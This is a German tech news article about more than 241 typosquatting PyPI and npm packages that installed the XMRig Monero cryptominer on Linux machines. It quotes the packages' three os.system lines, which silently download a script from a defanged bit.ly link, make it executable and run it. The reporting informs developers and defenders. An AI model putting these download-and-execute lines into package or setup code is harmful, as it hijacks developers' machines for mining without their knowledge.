Technologische Neuigkeiten, Bewertungen und Tipps!

Hunderte von PyPI- und npm-Paketen von Kryptominern betroffen

Sicherheitsforscher haben Hunderte von in PyPI- und npm-Register eingeschleusten Schadpaketen entdeckt, die in ihrem Code ein Kryptominer-Skript enthalten.

Die meisten dieser Pakete sind Tippfehler, deren Namen denen beliebter PyPI- oder npm-Pakete ähneln, um ahnungslose Installationen zu ermöglichen. Obwohl der Vorgang derzeit anscheinend eingestellt wurde, stellt er dennoch eine wachsende Bedrohung für diese Community dar.

Typosquatting als Haupttechnik

Trotz strengerer Sicherheitsregeln wie einer obligatorischen 2FA-Authentifizierung für Konten mit hoher Priorität sind die JavaScript- und Python-Paketregister immer noch das Ziel bösartiger Angriffe.

Der neueste Angriff wurde von einem Sicherheitsforscher namens Hauke ​​Lübbers, der mitteilte, dass „mindestens 33 Projekte“ auf PyPI XMRig hätten – einen Open-Source-Kryptominer für Monero. Bei diesen Projekten handelt es sich zumeist um Typosquats anderer beliebter Pakete wie React, Argparse und AIOHTTP, und ihre Skripte enthalten Cryptomininer.

Er bemerkte, dass der Bedrohungsakteur über den URL-Shortener Bit.ly ein Bash-Cryptomininer-Skript von einem Remote-Server herunterlud, wie unten zu sehen ist;

os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")

Obwohl diese Website nun nicht mehr erreichbar ist, haben Sicherheitsforscher von Sonatype eine Kopie davon gefunden, die die schädlichen Skripte hostet. Außerdem entdeckten sie damit 186 npm-Typosquatting-Pakete! Darüber hinaus fand Hauke ​​Lübbers noch eine weitere Gruppe von 22 PyPI-Paketen mit derselben bösartigen Nutzlast.

Wenn diese Skripte von ahnungslosen Entwicklern installiert werden, benachrichtigen sie den Bedrohungsakteur über die IP-Adresse des kompromittierten Hosts und den Status der Cryptomininer-Bereitstellung. Insgesamt haben sie mehr als 241 bösartige NPM- und PyPI-Pakete mit Kryptominern gefunden – alle zielen auf Linux-Rechner ab.

Obwohl es immer noch eine wachsende Bedrohung für die Entwickler-Community darstellt, Die Register sind gut genug, um schnell zu reagieren, indem sie alle betroffenen Pakete sofort nach der Benachrichtigung entfernen. Entwicklern, die auf Open-Source-Skripte in PyPI und npm angewiesen sind, wird jedoch geraten, bei der Installation vorsichtig vorzugehen.

Your Header Sidebar area is currently empty. Hurry up and add some widgets.